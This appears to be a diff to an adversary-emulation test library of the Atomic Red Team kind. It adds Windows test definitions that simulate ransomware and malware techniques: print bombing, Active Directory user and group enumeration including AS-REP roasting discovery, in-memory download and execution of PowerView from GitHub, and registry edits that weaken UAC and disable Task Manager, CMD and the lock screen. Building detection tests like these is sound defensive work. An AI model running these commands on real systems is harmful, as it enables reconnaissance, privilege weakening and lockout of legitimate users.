+    command: |
+      Get-Process
+    name: powershell
+- name: Process Discovery - get-wmiObject
+  auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
+  description: |
+    Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+    Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      get-wmiObject -class Win32_Process
+    name: powershell
+- name: Process Discovery - wmic process
+  auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+  description: |
+    Utilize windows management instrumentation to identify processes.
+
+    Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wmic process get /format:list
+    name: command_prompt
@@ -14,6 +14,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu

 - [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)

+- [Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing](#atomic-test-4---simulate-blackbyte-ransomware-print-bombing)
+

 <br/>

@@ -137,4 +139,56 @@ Command line executed via suspicious invocation. Example is from the 2021 Threat



+<br/>
+<br/>
+
+## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
+This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+See https://redcanary.com/blog/blackbyte-ransomware/.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_print | File to be opened/printed by Wordpad. | String | $env:temp&#92;T1059_003note.txt|
+| max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+```
+
+#### Cleanup Commands:
+```powershell
+stop-process -name wordpad -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: File to print must exist on disk at specified location (#{file_to_print})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+```
+
+
+
+
 <br/>
@@ -71,3 +71,34 @@ atomic_tests:
    command: |
      %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
    name: command_prompt
+- name: Simulate BlackByte Ransomware Print Bombing
+  auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+  description: |
+    This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+    It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+    See https://redcanary.com/blog/blackbyte-ransomware/. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_to_print:
+      description: File to be opened/printed by Wordpad.
+      type: String
+      default: $env:temp\T1059_003note.txt
+    max_to_print:
+      description: The maximum number of Wordpad windows the test will open/print.
+      type: String
+      default: 75
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      File to print must exist on disk at specified location (#{file_to_print})
+    prereq_command: |
+      if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+  executor:
+    command: |
+      cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+    cleanup_command: |
+      stop-process -name wordpad -force -erroraction silentlycontinue
+    name: powershell
@@ -46,7 +46,6 @@ cscript #{vbscript} > $env:TEMP\T1059.005.out.txt

 #### Cleanup Commands:
 ```powershell
-Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
 Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ```

@@ -60,9 +59,8 @@ if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
 New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
 ```


@@ -19,13 +19,11 @@ atomic_tests:
  - description: Sample script must exist on disk at specified location (#{vbscript})
    prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
    get_prereq_command: |-
-      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
      New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-      Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
  executor:
    command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
    cleanup_command: |-
-      Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
      Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
    name: powershell

@@ -22,6 +22,16 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr

 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)

+- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)
+
+- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)
+
+- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)
+
+- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)
+

 <br/>

@@ -308,4 +318,172 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste



+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup
+The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdGroup -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+When successful, accounts that do not require kerberos pre-auth will be returned.
+Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined.
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually.
+```
+##### Description: Requires the Active Directory module for powershell to be installed.
+##### Check Prereq Commands:
+```powershell
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Get-DomainGroupMember with PowerView
+Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Get-DomainGroup with PowerView
+Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+```
+
+
+
+
+
+
 <br/>
@@ -133,3 +133,76 @@ atomic_tests:
    command: |
      #{adfind_path} -f (objectcategory=group)
    name: command_prompt
+- name: Enumerate Active Directory Groups with Get-AdGroup
+  auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+  description: |
+    The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      Get-AdGroup -Filter *
+- name: Enumerate Active Directory Groups with ADSISearcher
+  auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+  auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+  description: |
+    When successful, accounts that do not require kerberos pre-auth will be returned.
+    Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+  supported_platforms:
+    - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined.
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually.
+  - description: |
+      Requires the Active Directory module for powershell to be installed.
+    prereq_command: |
+      if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+- name: Get-DomainGroupMember with PowerView
+  auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+  description: |
+    Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+    name: powershell 
+- name: Get-DomainGroup with PowerView
+  auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+  description: |
+    Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+    name: powershell 
@@ -26,6 +26,10 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code

 - [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)

+- [Atomic Test #11 - Get-DomainUser with PowerView](#atomic-test-11---get-domainuser-with-powerview)
+
+- [Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-12---enumerate-active-directory-users-with-adsisearcher)
+

 <br/>

@@ -441,4 +445,63 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {



+<br/>
+<br/>
+
+## Atomic Test #11 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93662494-5ed7-4454-a04c-8c8372808ac2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+Upon successful execution a listing of users will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
+```
+
+
+
+
+
+
 <br/>
@@ -214,3 +214,28 @@ atomic_tests:
    elevation_required: false
    command: |
      Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+
+- name: Get-DomainUser with PowerView
+  auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+    name: powershell
+- name: Enumerate Active Directory Users with ADSISearcher
+  auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+    Upon successful execution a listing of users will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
@@ -24,6 +24,24 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)

+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+
+- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool)
+
+- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application)
+
+- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
+
+- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center)
+
+- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button)
+
+- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button)
+
+- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature)
+
+- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
+

 <br/>

@@ -282,9 +300,318 @@ cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPaths

 #### Cleanup Commands:
 ```cmd
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Disable Windows Registry Tool
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Disable Windows CMD application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2561a6d-72bd-408c-b150-13efe1801c2a
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Task Manager application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** af254e70-dd0e-4de6-9afe-a994d9ea8b62
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Notification Center
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Disable Windows Shutdown Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Disable Windows LogOff Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e246578a-c24d-46a7-9237-0213ff86fb0c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #15 - Disable Windows Change Password Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d4a6da40-618f-454d-9a9e-26af552aaeb0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #16 - Disable Windows Lock Workstation Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
 ```


@@ -127,9 +127,146 @@ atomic_tests:
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
    name: command_prompt
    elevation_required: true
-    
+- name: BlackByte Ransomware Registry Changes - Powershell
